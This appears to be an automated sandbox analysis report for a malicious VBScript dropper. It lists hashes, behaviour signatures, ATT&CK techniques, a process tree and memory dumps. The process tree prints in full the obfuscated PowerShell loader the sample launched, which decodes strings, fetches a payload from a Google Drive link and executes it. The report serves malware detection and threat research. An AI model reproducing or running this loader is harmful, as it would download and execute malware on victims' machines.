afa1c04b2a56bfb07fcedb39fa07e3ddb5a2760bab1d0dfaa6043e9ce9ea48da

General

Target

20220830_ProtecoPTE..vbs
Size

8KB
MD5

a0ea5a34494368d9e1375f1e5990fdaf
SHA1

54045ae962c9bdd612a9be947442086fc5bcd44c
SHA256

afa1c04b2a56bfb07fcedb39fa07e3ddb5a2760bab1d0dfaa6043e9ce9ea48da
SHA512

fd7510ee1a0de297c9d4fab4ac7df7f6af7b5aa201d38773aef881ecf766af8d9ecdd4a0958edfced900d416e977a099b351272a8e26698850f0263e86d96ebd
SSDEEP

192:spKsbUuCUwy2riaB/Y4Bf7f102btBF8uDrq0wVHZsPpsp/dp93KqcMd5JQmJr9Pv:spKsbUuCUwyIiu/xfB0itv84rTm5gsxV

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

5 3992 powershell.exe
11 3992 powershell.exe

flow	pid	process
5	3992	powershell.exe
11	3992	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4084619521-2220719027-1909462854-1000\Control Panel\International\Geo\Nation	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

4 drive.google.com
5 drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

372 3632 WerFault.exe powershell.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid process

3992 powershell.exe
3992 powershell.exe
3632 powershell.exe
3632 powershell.exe
3632 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 3992 powershell.exe
Token: SeDebugPrivilege 3632 powershell.exe

flow	ioc
4	drive.google.com
5	drive.google.com

pid	pid_target	process	target process
372	3632	WerFault.exe	powershell.exe

pid	process
3992	powershell.exe
3992	powershell.exe
3632	powershell.exe
3632	powershell.exe
3632	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3992	powershell.exe
Token: SeDebugPrivilege	3632	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2608 wrote to memory of 3992	2608	WScript.exe	powershell.exe
PID 2608 wrote to memory of 3992	2608	WScript.exe	powershell.exe
PID 3992 wrote to memory of 3776	3992	powershell.exe	cmd.exe
PID 3992 wrote to memory of 3776	3992	powershell.exe	cmd.exe
PID 3992 wrote to memory of 3632	3992	powershell.exe	powershell.exe
PID 3992 wrote to memory of 3632	3992	powershell.exe	powershell.exe
PID 3992 wrote to memory of 3632	3992	powershell.exe	powershell.exe
PID 3632 wrote to memory of 1924	3632	powershell.exe	cmd.exe
PID 3632 wrote to memory of 1924	3632	powershell.exe	cmd.exe
PID 3632 wrote to memory of 1924	3632	powershell.exe	cmd.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20220830_ProtecoPTE..vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2608

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Geleddernes = 1;$Arbejdsdatabasen='Substrin';$Arbejdsdatabasen+='g';Function Inangulate79($Entrechat){$Pakkeliste=$Entrechat.Length-$Geleddernes;For($Pensionsreglerne=5; $Pensionsreglerne -lt $Pakkeliste; $Pensionsreglerne+=(6)){$Sommerlejre+=$Entrechat.$Arbejdsdatabasen.Invoke($Pensionsreglerne, $Geleddernes);}$Sommerlejre;}function Foreprovided($Saddelmagervrkstedet){. ($Saarbarheds) ($Saddelmagervrkstedet);}$Brookless=Inangulate79 ' ybarMSat rorabboz .ordi Saa,l .osalDioceaTorre/ Orde5Benzo. L,ri0P,yto Dyste(BdetaWOptimiHolomnS raydKir.eoTr phwOkto,s ver BaglyNPullbTAffin V tha1.rone0Kniv,.Uder 0 Phot; Srud ForbrWregneiJernbn ,ant6Menne4Delta;Gnu.b BajoxSt.rk6Komma4Reper; Utro SysterSnesevGodtg:Hjemg1Troml2agen,1Spr n.Fence0N.ate)Vej,e Unw,G Bo ke Ha kcNoniskUnpeaoRetro/Ponde2chemo0Tabu 1Fag l0Biang0 Emen1Nonop0Cl.pp1Skide OffenFJuniaiBu lirbetonejannyfDelusoCon,ex P,og/ rig.1Cris.2Siles1Tumul..ucci0 Hand ';$Prosektor=Inangulate79 'UtilfUAnanisMi roeMillirKup.a- ShesASkgekgBrickeSvrvgn Kla t C.mm ';$Skridtmaaleres=Inangulate79 '.rveoh crett ithot Myt pKarets Ko.r:.etor/ Assi/ ParadRegior fag iBurblvEmotiePrigg.KambagKrebioMonzoo Platgcoultl.refieTelet.Ti recForfaoSkjormastra/kravluPse dcUnder?,opoge .kanxTanklpAcredoMiddlrPerist G us=Perfod CocaoShirtwBage.nHyleglSmle oknoc.aZoomedDuckp&Gal,ci,nhumd norm=Copul1SdendcGlimm4Bver,JKaffeFUndev6Misd,w R.pa3Flamm0Mark.tPy.rocB.skamRigleCHet rpAmovaX ofagJ Filmmtr,inO.inlaBOverfj.hikahNoncozS ereGan gnvEcca 8 Ulst9 Unafrga,mawBriss2Venstx datoDTrfsie petatunimb ';$Amianthus=Inangulate79 'Raadi>a.amn ';$Saarbarheds=Inangulate79 'BajerichriseUfdtbxAnt.b ';$Krystalfrekvensen='Burds';Foreprovided (Inangulate79 ' StirSSoloeeDa.hntLeuco-RimpiC EkstoMelodn Adalt di,seBlegvn SkrmtIrrec Finla-behanPDeputaCaladtFiredh nro KanawTSeko : Tale\GrockK EyesoTematnDi tak .npeu Ps.ur Ve,sr Fo,seLejrsnFanfoc ,enneHippis Shi aLingumSu.dhf .lmiutikmpnSagfrdS.riaeGoodwnPyxeseKolonsFr sn.ChemotWarmnx InsetTagvi endw-Flyv,V IrreaCentrlUdbliuToothe Grei nontr$PrdisKUltrarPri,tyS agts Ba nt Su,ea ksemlCar if Favor ch.leSupinkMelanven ereSammenHovedsCosmee,acspnNelso; Skro ');Foreprovided (Inangulate79 'F.rreiBlgetf Fami E,str(Gl.ttt K,zaeFravasLuccatLeat,-zuniap,ranuaChapotTrifoh Krn FilhTPhola:Stads\Co peKWrabboLrebrnM,juskMozamuBetaerOrdinrPr.sseBoraznKaldecAnmeleT,angsMimera CathmMullafSvmmeuSem,nn ErfadKalkpe enmanHeksee Ov rsRes e. Pedet Tur.xConc,t R,pe) Aphi{sweete Pyl,x binsioutfetAldol}Lands;Gerr ');$judaica = Inangulate79 ' AnedeFlagac Re.ohDatacoHidr oxyd %BarbeaNinnipD terpStvekdOktaeaNotostPo.tnaSeatm% pslu\Ud.oeSPiarot Ora.iKinespEksprpWe.ldl Ba.te Domed Lnov1Forva0Armar7Mimic.BekliuSkyggn .none Jord Krepn&Orbic&Gulvm ataxoePeriecSlughh Stero Gas Angaa$Diabe ';Foreprovided (Inangulate79 'Sk kl$sharpg Besml TppeoL.dssbDisk,aBlitzlSpiri:KlappFNegleaTordelcaprilPhysioStenzs brnde ismarM.ress Mrke1glass6Porte9Rogat=Riob (AnthocNonb.mSpecidMenin Banne/Tinsoc onul Milie$Trindjcivilu ummad UnsoaMilieiRukanc .ineaKonst)Garne ');Foreprovided (Inangulate79 'Skudd$ lbegCemenlOveruoBil,obMoralaSonorlRejoi:DiskeEpartiuStavrbWapsda SoutcA,rodtFrikeeR giorki hoiTeazeuHu rmm stra=Dkke.$PewinSFlarykD,ssorDanewikkkendR,ichtDiagnmTsninaKejs,a.nosclAfk ve,irglrKlargeBegynsDe,ig. Babys.ilhapUnderlCu.tii PhiatUnde (Travh$Phen,ASmud mCom,liV lutaE,ghtnPluknt FredhVaginu alkus,reel)Dimpl ');$Skridtmaaleres=$Eubacterium[0];Foreprovided (Inangulate79 'Venek$Generg SyntlP.oduoS.raybHusm,a.rokllHvlej:sammeOTr,sovVisuaeCata,rNone.iHane,sQuinieDublx1Le.es0 Prer6Ne ha= H.nsN Earie B,omwTrakt-PairpORivinbPhialjFremmebr.kic OvertPour, nonpaSCaloryIn,ogsVaa et Sp neOvenpmGonoc.PleisN.jlfoeAutovtFemka.U sttWDepeneundstbVgtklC JustlFl,keiPetraeLutten,nstatMetha ');Foreprovided (Inangulate79 'Lysaa$ BiorOMuzakv Un.oePrivar CentiNotatsUdsoneSitop1Slavo0 Syer6,reco.martyH Dy.meBa.eaaUnarcdFreg,eCivilrSignasRevol[,lves$sladrP Udb,rIndenoPsychs Tw,neexpirkUns,atBa lvo OverrSpise]Norma= kend$DanskBAlbinrTotaloangstoDedikkTotr,lPig,teNon.ysFamilsQ.esa ');$Sew=Inangulate79 '.yrenOPropovsaliceLsketrMusiciRh,mnsVrtsle err1Kuppe0Anfre6Udha .ParkiDProgroMad owScrolnSocialGladdoSaddea Inged MuroF sub,iMercalOrr.peInane(Conte$ReheaSSrb skSludfrBeraaiPer.pdFrafatCacogmPoi taOmostaUdplal retreJournrDenedeStdpus Stou,K,rak$PerfoP ShoohTabelo UnmerChafeoCavalmSp.oge ProctMot rr Pibeyforsp)s,otg ';$Sew=$Fallosers169[1]+$Sew;$Phorometry=$Fallosers169[0];Foreprovided (Inangulate79 'Ensre$formagSkottl.oinmo TaffbPamflaidnerlInflu:LagenbbyzonoOve,fvHodadiAfgannprivaiTrametYeggsiidrt,eReg osForst= ,las(KnottT Vadeesti.esCinchtLandb-Gr.seP TastaBilagtSynk,h.rest Jordl$ UndeP PlanhMagneo ,litr L,cho estam redde AlvetSidstrDicyey Atta)Be lu ');while (!$bovinities) {Foreprovided (Inangulate79 'Mo,by$Jenkog aretlStorkoSlgtsbholliaCharaltr pe: ErhvMDempnoEksplrUds,urNonrahTran u.aratiDiscon unta= .ang$ an.ltLegemrGeniau Systede ut ') ;Foreprovided $Sew;Foreprovided (Inangulate79 'Saml.SAabnit,ereoaC,nstr Toggtmis,r-.abriSV.llulKlicheFristeI,aqip Nege unim4 Town ');Foreprovided (Inangulate79 'Slugg$umenngtypeblout,hoIndsibPrcisaSystel nmak:guldebM.todoTo.mavL,tiniMundsnflintikloaktReligi He.leH tersZebue=,ight( StabTAmmoneHu drslavistS.ran-Be krPCirkuaRig.ut Tak h,kste Kolpo$SuberPVelathPamfloBiogerL.geboAgricmNatureAftaltHaulerRespoyAkkum)G.ads ') ;Foreprovided (Inangulate79 ' slid$Abst.gAutoflGladiodiaclb obliaAntirl ronk:SprutCG.insagutterRootln Equii Aaref FrysiToolseProvod Genn1Stabe9 Uund3 Hule=Iyars$Re,stgFeelilSpildoMask bTurnpaLog.elBill,:Lay,uSBrus.l MiskyMindenI ritgNonv,nGugleiBarr.nestaegTrunceScenorErysinEmbede ,jansDataf+Exfig+Slagv%Stddm$J,tbrEFunktuMe asbTekniaJunnicYanintPre,leBrin rInexpi Dobbu Ove mFonom.CulotcRredfo Unduu,aston CametKl.ch ') ;$Skridtmaaleres=$Eubacterium[$Carnified193];}Foreprovided (Inangulate79 'Histo$blankgUngsklJagtro.kolebTopotaBeslulK.nku:BlaffPOverroAfr,asPaatvtSkyllv DisksD.coynExtroeT.oppr Aco Skri=Feebl SkurkGsoundeSkilrtlyric-GeomoCAng loSupernDimplt AkvaeHardenUni,vtB.nda Kash$F.ambPSe arh.yskoo neutrAllisoYark,mGtevieKildetmoderrV entyVmmel ');Foreprovided (Inangulate79 ' Opr $EvanggUnhoilArango .atrbUdboraDac,slHea.e: saliGHa edoChalcl GraagCer.uo Hnget confh .iruaSeng, Pall=Grano Nyczi[Torp SForsky.attesAlephtDommeeMast,mL.ere.IndolCSte.ioproexnBrnevv IndueKurisrDechitBesae] U me: Bris:IliasFKlo srImmi,oBub.em ap.eB PantaNonassdepileEro.i6Squas4Posi SAcrotttransr previ.entrnGn,isg nacc(Stabl$InterPBloodoOmfatsPill,tBjld.v I,cis Aul.nL,onseGunshrSenat)Brygg ');Foreprovided (Inangulate79 'Opslu$TrykkgRoughlTilgoo ranibCowpea helolkodev:SpidsFUnderi,atursHyl,ekBriefeOfferrFejltiKronefMonseoSkyldrdowngefoedtnther.iPaladnirreggFagu sUnloo Squin= Peri No fr[OverpS K.ttyPhalasSkibstS ruteMidermstre,.Bra iTLenete DdbixDorsetStan.. Ac,oEBiomenSi,elcZaphroAlcaydMu,hmi SpecnDiaphgTankb]Hagge:Manip:Klum AOverbSCh.moCFor aIPomacINoume.acemiGankuse,megmt Lat S.ndertKynikr s.ppiGear,ndynamgBr.kk(Het r$OutgaGSvejsoBethrlF,erbgU tado AdretUnthehUnneeaAhnfe) f,gk ');Foreprovided (Inangulate79 ' Anke$Col,ngLavrylJasteo MellbFrosca ndelPosta:,aiwaORetsvvFuldte AnnorImparbAnmela relir ManorIoanneWilkin ermwn oghaeCac ds ndss Hern=Disse$T lsmF MuriiAfbl,s VagtkDeli.ePyxidr ouldiTraumfRaglaoUn,errMa.cee Fa.dnT.btyianal nPaestgAspresUdv,k.PlatysEstruuRemoobBinyrsDisd.tBeraprI turiMarmonEks ogLiefl(Repti3 Sulf2T,pht1 Vitu2Han.a6 onde9centr,Klutz2Excul8Eksek7Strep7.tepg0Pan u)Kenss ');Foreprovided $Overbarrenness;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3992

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Stippled107.une && echo $"
3⤵
PID:3776

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Geleddernes = 1;$Arbejdsdatabasen='Substrin';$Arbejdsdatabasen+='g';Function Inangulate79($Entrechat){$Pakkeliste=$Entrechat.Length-$Geleddernes;For($Pensionsreglerne=5; $Pensionsreglerne -lt $Pakkeliste; $Pensionsreglerne+=(6)){$Sommerlejre+=$Entrechat.$Arbejdsdatabasen.Invoke($Pensionsreglerne, $Geleddernes);}$Sommerlejre;}function Foreprovided($Saddelmagervrkstedet){. ($Saarbarheds) ($Saddelmagervrkstedet);}$Brookless=Inangulate79 ' ybarMSat rorabboz .ordi Saa,l .osalDioceaTorre/ Orde5Benzo. L,ri0P,yto Dyste(BdetaWOptimiHolomnS raydKir.eoTr phwOkto,s ver BaglyNPullbTAffin V tha1.rone0Kniv,.Uder 0 Phot; Srud ForbrWregneiJernbn ,ant6Menne4Delta;Gnu.b BajoxSt.rk6Komma4Reper; Utro SysterSnesevGodtg:Hjemg1Troml2agen,1Spr n.Fence0N.ate)Vej,e Unw,G Bo ke Ha kcNoniskUnpeaoRetro/Ponde2chemo0Tabu 1Fag l0Biang0 Emen1Nonop0Cl.pp1Skide OffenFJuniaiBu lirbetonejannyfDelusoCon,ex P,og/ rig.1Cris.2Siles1Tumul..ucci0 Hand ';$Prosektor=Inangulate79 'UtilfUAnanisMi roeMillirKup.a- ShesASkgekgBrickeSvrvgn Kla t C.mm ';$Skridtmaaleres=Inangulate79 '.rveoh crett ithot Myt pKarets Ko.r:.etor/ Assi/ ParadRegior fag iBurblvEmotiePrigg.KambagKrebioMonzoo Platgcoultl.refieTelet.Ti recForfaoSkjormastra/kravluPse dcUnder?,opoge .kanxTanklpAcredoMiddlrPerist G us=Perfod CocaoShirtwBage.nHyleglSmle oknoc.aZoomedDuckp&Gal,ci,nhumd norm=Copul1SdendcGlimm4Bver,JKaffeFUndev6Misd,w R.pa3Flamm0Mark.tPy.rocB.skamRigleCHet rpAmovaX ofagJ Filmmtr,inO.inlaBOverfj.hikahNoncozS ereGan gnvEcca 8 Ulst9 Unafrga,mawBriss2Venstx datoDTrfsie petatunimb ';$Amianthus=Inangulate79 'Raadi>a.amn ';$Saarbarheds=Inangulate79 'BajerichriseUfdtbxAnt.b ';$Krystalfrekvensen='Burds';Foreprovided (Inangulate79 ' StirSSoloeeDa.hntLeuco-RimpiC EkstoMelodn Adalt di,seBlegvn SkrmtIrrec Finla-behanPDeputaCaladtFiredh nro KanawTSeko : Tale\GrockK EyesoTematnDi tak .npeu Ps.ur Ve,sr Fo,seLejrsnFanfoc ,enneHippis Shi aLingumSu.dhf .lmiutikmpnSagfrdS.riaeGoodwnPyxeseKolonsFr sn.ChemotWarmnx InsetTagvi endw-Flyv,V IrreaCentrlUdbliuToothe Grei nontr$PrdisKUltrarPri,tyS agts Ba nt Su,ea ksemlCar if Favor ch.leSupinkMelanven ereSammenHovedsCosmee,acspnNelso; Skro ');Foreprovided (Inangulate79 'F.rreiBlgetf Fami E,str(Gl.ttt K,zaeFravasLuccatLeat,-zuniap,ranuaChapotTrifoh Krn FilhTPhola:Stads\Co peKWrabboLrebrnM,juskMozamuBetaerOrdinrPr.sseBoraznKaldecAnmeleT,angsMimera CathmMullafSvmmeuSem,nn ErfadKalkpe enmanHeksee Ov rsRes e. Pedet Tur.xConc,t R,pe) Aphi{sweete Pyl,x binsioutfetAldol}Lands;Gerr ');$judaica = Inangulate79 ' AnedeFlagac Re.ohDatacoHidr oxyd %BarbeaNinnipD terpStvekdOktaeaNotostPo.tnaSeatm% pslu\Ud.oeSPiarot Ora.iKinespEksprpWe.ldl Ba.te Domed Lnov1Forva0Armar7Mimic.BekliuSkyggn .none Jord Krepn&Orbic&Gulvm ataxoePeriecSlughh Stero Gas Angaa$Diabe ';Foreprovided (Inangulate79 'Sk kl$sharpg Besml TppeoL.dssbDisk,aBlitzlSpiri:KlappFNegleaTordelcaprilPhysioStenzs brnde ismarM.ress Mrke1glass6Porte9Rogat=Riob (AnthocNonb.mSpecidMenin Banne/Tinsoc onul Milie$Trindjcivilu ummad UnsoaMilieiRukanc .ineaKonst)Garne ');Foreprovided (Inangulate79 'Skudd$ lbegCemenlOveruoBil,obMoralaSonorlRejoi:DiskeEpartiuStavrbWapsda SoutcA,rodtFrikeeR giorki hoiTeazeuHu rmm stra=Dkke.$PewinSFlarykD,ssorDanewikkkendR,ichtDiagnmTsninaKejs,a.nosclAfk ve,irglrKlargeBegynsDe,ig. Babys.ilhapUnderlCu.tii PhiatUnde (Travh$Phen,ASmud mCom,liV lutaE,ghtnPluknt FredhVaginu alkus,reel)Dimpl ');$Skridtmaaleres=$Eubacterium[0];Foreprovided (Inangulate79 'Venek$Generg SyntlP.oduoS.raybHusm,a.rokllHvlej:sammeOTr,sovVisuaeCata,rNone.iHane,sQuinieDublx1Le.es0 Prer6Ne ha= H.nsN Earie B,omwTrakt-PairpORivinbPhialjFremmebr.kic OvertPour, nonpaSCaloryIn,ogsVaa et Sp neOvenpmGonoc.PleisN.jlfoeAutovtFemka.U sttWDepeneundstbVgtklC JustlFl,keiPetraeLutten,nstatMetha ');Foreprovided (Inangulate79 'Lysaa$ BiorOMuzakv Un.oePrivar CentiNotatsUdsoneSitop1Slavo0 Syer6,reco.martyH Dy.meBa.eaaUnarcdFreg,eCivilrSignasRevol[,lves$sladrP Udb,rIndenoPsychs Tw,neexpirkUns,atBa lvo OverrSpise]Norma= kend$DanskBAlbinrTotaloangstoDedikkTotr,lPig,teNon.ysFamilsQ.esa ');$Sew=Inangulate79 '.yrenOPropovsaliceLsketrMusiciRh,mnsVrtsle err1Kuppe0Anfre6Udha .ParkiDProgroMad owScrolnSocialGladdoSaddea Inged MuroF sub,iMercalOrr.peInane(Conte$ReheaSSrb skSludfrBeraaiPer.pdFrafatCacogmPoi taOmostaUdplal retreJournrDenedeStdpus Stou,K,rak$PerfoP ShoohTabelo UnmerChafeoCavalmSp.oge ProctMot rr Pibeyforsp)s,otg ';$Sew=$Fallosers169[1]+$Sew;$Phorometry=$Fallosers169[0];Foreprovided (Inangulate79 'Ensre$formagSkottl.oinmo TaffbPamflaidnerlInflu:LagenbbyzonoOve,fvHodadiAfgannprivaiTrametYeggsiidrt,eReg osForst= ,las(KnottT Vadeesti.esCinchtLandb-Gr.seP TastaBilagtSynk,h.rest Jordl$ UndeP PlanhMagneo ,litr L,cho estam redde AlvetSidstrDicyey Atta)Be lu ');while (!$bovinities) {Foreprovided (Inangulate79 'Mo,by$Jenkog aretlStorkoSlgtsbholliaCharaltr pe: ErhvMDempnoEksplrUds,urNonrahTran u.aratiDiscon unta= .ang$ an.ltLegemrGeniau Systede ut ') ;Foreprovided $Sew;Foreprovided (Inangulate79 'Saml.SAabnit,ereoaC,nstr Toggtmis,r-.abriSV.llulKlicheFristeI,aqip Nege unim4 Town ');Foreprovided (Inangulate79 'Slugg$umenngtypeblout,hoIndsibPrcisaSystel nmak:guldebM.todoTo.mavL,tiniMundsnflintikloaktReligi He.leH tersZebue=,ight( StabTAmmoneHu drslavistS.ran-Be krPCirkuaRig.ut Tak h,kste Kolpo$SuberPVelathPamfloBiogerL.geboAgricmNatureAftaltHaulerRespoyAkkum)G.ads ') ;Foreprovided (Inangulate79 ' slid$Abst.gAutoflGladiodiaclb obliaAntirl ronk:SprutCG.insagutterRootln Equii Aaref FrysiToolseProvod Genn1Stabe9 Uund3 Hule=Iyars$Re,stgFeelilSpildoMask bTurnpaLog.elBill,:Lay,uSBrus.l MiskyMindenI ritgNonv,nGugleiBarr.nestaegTrunceScenorErysinEmbede ,jansDataf+Exfig+Slagv%Stddm$J,tbrEFunktuMe asbTekniaJunnicYanintPre,leBrin rInexpi Dobbu Ove mFonom.CulotcRredfo Unduu,aston CametKl.ch ') ;$Skridtmaaleres=$Eubacterium[$Carnified193];}Foreprovided (Inangulate79 'Histo$blankgUngsklJagtro.kolebTopotaBeslulK.nku:BlaffPOverroAfr,asPaatvtSkyllv DisksD.coynExtroeT.oppr Aco Skri=Feebl SkurkGsoundeSkilrtlyric-GeomoCAng loSupernDimplt AkvaeHardenUni,vtB.nda Kash$F.ambPSe arh.yskoo neutrAllisoYark,mGtevieKildetmoderrV entyVmmel ');Foreprovided (Inangulate79 ' Opr $EvanggUnhoilArango .atrbUdboraDac,slHea.e: saliGHa edoChalcl GraagCer.uo Hnget confh .iruaSeng, Pall=Grano Nyczi[Torp SForsky.attesAlephtDommeeMast,mL.ere.IndolCSte.ioproexnBrnevv IndueKurisrDechitBesae] U me: Bris:IliasFKlo srImmi,oBub.em ap.eB PantaNonassdepileEro.i6Squas4Posi SAcrotttransr previ.entrnGn,isg nacc(Stabl$InterPBloodoOmfatsPill,tBjld.v I,cis Aul.nL,onseGunshrSenat)Brygg ');Foreprovided (Inangulate79 'Opslu$TrykkgRoughlTilgoo ranibCowpea helolkodev:SpidsFUnderi,atursHyl,ekBriefeOfferrFejltiKronefMonseoSkyldrdowngefoedtnther.iPaladnirreggFagu sUnloo Squin= Peri No fr[OverpS K.ttyPhalasSkibstS ruteMidermstre,.Bra iTLenete DdbixDorsetStan.. Ac,oEBiomenSi,elcZaphroAlcaydMu,hmi SpecnDiaphgTankb]Hagge:Manip:Klum AOverbSCh.moCFor aIPomacINoume.acemiGankuse,megmt Lat S.ndertKynikr s.ppiGear,ndynamgBr.kk(Het r$OutgaGSvejsoBethrlF,erbgU tado AdretUnthehUnneeaAhnfe) f,gk ');Foreprovided (Inangulate79 ' Anke$Col,ngLavrylJasteo MellbFrosca ndelPosta:,aiwaORetsvvFuldte AnnorImparbAnmela relir ManorIoanneWilkin ermwn oghaeCac ds ndss Hern=Disse$T lsmF MuriiAfbl,s VagtkDeli.ePyxidr ouldiTraumfRaglaoUn,errMa.cee Fa.dnT.btyianal nPaestgAspresUdv,k.PlatysEstruuRemoobBinyrsDisd.tBeraprI turiMarmonEks ogLiefl(Repti3 Sulf2T,pht1 Vitu2Han.a6 onde9centr,Klutz2Excul8Eksek7Strep7.tepg0Pan u)Kenss ');Foreprovided $Overbarrenness;"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3632

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Stippled107.une && echo $"
4⤵
PID:1924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 2576
4⤵
- Program crash
PID:372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3632 -ip 3632
1⤵
PID:3224

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a4etqiij.s4b.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Stippled107.une
Filesize
455KB

MD5
de5eef13f471d82f8dead40c25baa691

SHA1
ba5233bae79d4d3fb4796c7d8b26fb3363bd0f09

SHA256
630c6a75d9d33f1e8a423918212b124c5dda599596f4bf83af00d049021392c3

SHA512
d9f3f940003c0edb5ed4a46d8a453700450738727817f53be5e63e2f3da84ba23fa4a674a434eb8f54af9b52354d721d37d621c5fcf50919f8d0bcf6de9e2112

Download Submit
memory/3632-22-0x0000000005AC0000-0x0000000005B26000-memory.dmp

Filesize
408KB

Download
memory/3632-37-0x0000000006860000-0x000000000687A000-memory.dmp

Filesize
104KB

Download
memory/3632-23-0x0000000005BA0000-0x0000000005C06000-memory.dmp

Filesize
408KB

Download
memory/3632-42-0x0000000074DA0000-0x0000000075550000-memory.dmp

Filesize
7.7MB

Download
memory/3632-17-0x0000000074DA0000-0x0000000075550000-memory.dmp

Filesize
7.7MB

Download
memory/3632-16-0x0000000004D00000-0x0000000004D36000-memory.dmp

Filesize
216KB

Download
memory/3632-18-0x0000000004E50000-0x0000000004E60000-memory.dmp

Filesize
64KB

Download
memory/3632-19-0x0000000004E50000-0x0000000004E60000-memory.dmp

Filesize
64KB

Download
memory/3632-20-0x0000000005490000-0x0000000005AB8000-memory.dmp

Filesize
6.2MB

Download
memory/3632-33-0x0000000005C90000-0x0000000005FE4000-memory.dmp

Filesize
3.3MB

Download
memory/3632-40-0x0000000008750000-0x0000000008CF4000-memory.dmp

Filesize
5.6MB

Download
memory/3632-39-0x00000000068C0000-0x00000000068E2000-memory.dmp

Filesize
136KB

Download
memory/3632-21-0x00000000053D0000-0x00000000053F2000-memory.dmp

Filesize
136KB

Download
memory/3632-34-0x00000000062B0000-0x00000000062CE000-memory.dmp

Filesize
120KB

Download
memory/3632-35-0x00000000062E0000-0x000000000632C000-memory.dmp

Filesize
304KB

Download
memory/3632-36-0x0000000007B20000-0x000000000819A000-memory.dmp

Filesize
6.5MB

Download
memory/3632-38-0x0000000007560000-0x00000000075F6000-memory.dmp

Filesize
600KB

Download
memory/3992-11-0x000002027D680000-0x000002027D690000-memory.dmp

Filesize
64KB

Download
memory/3992-45-0x00007FFDD59E0000-0x00007FFDD64A1000-memory.dmp

Filesize
10.8MB

Download
memory/3992-12-0x000002027D680000-0x000002027D690000-memory.dmp

Filesize
64KB

Download
memory/3992-10-0x00007FFDD59E0000-0x00007FFDD64A1000-memory.dmp

Filesize
10.8MB

Download
memory/3992-13-0x000002027D680000-0x000002027D690000-memory.dmp

Filesize
64KB

Download
memory/3992-2-0x000002027D600000-0x000002027D622000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing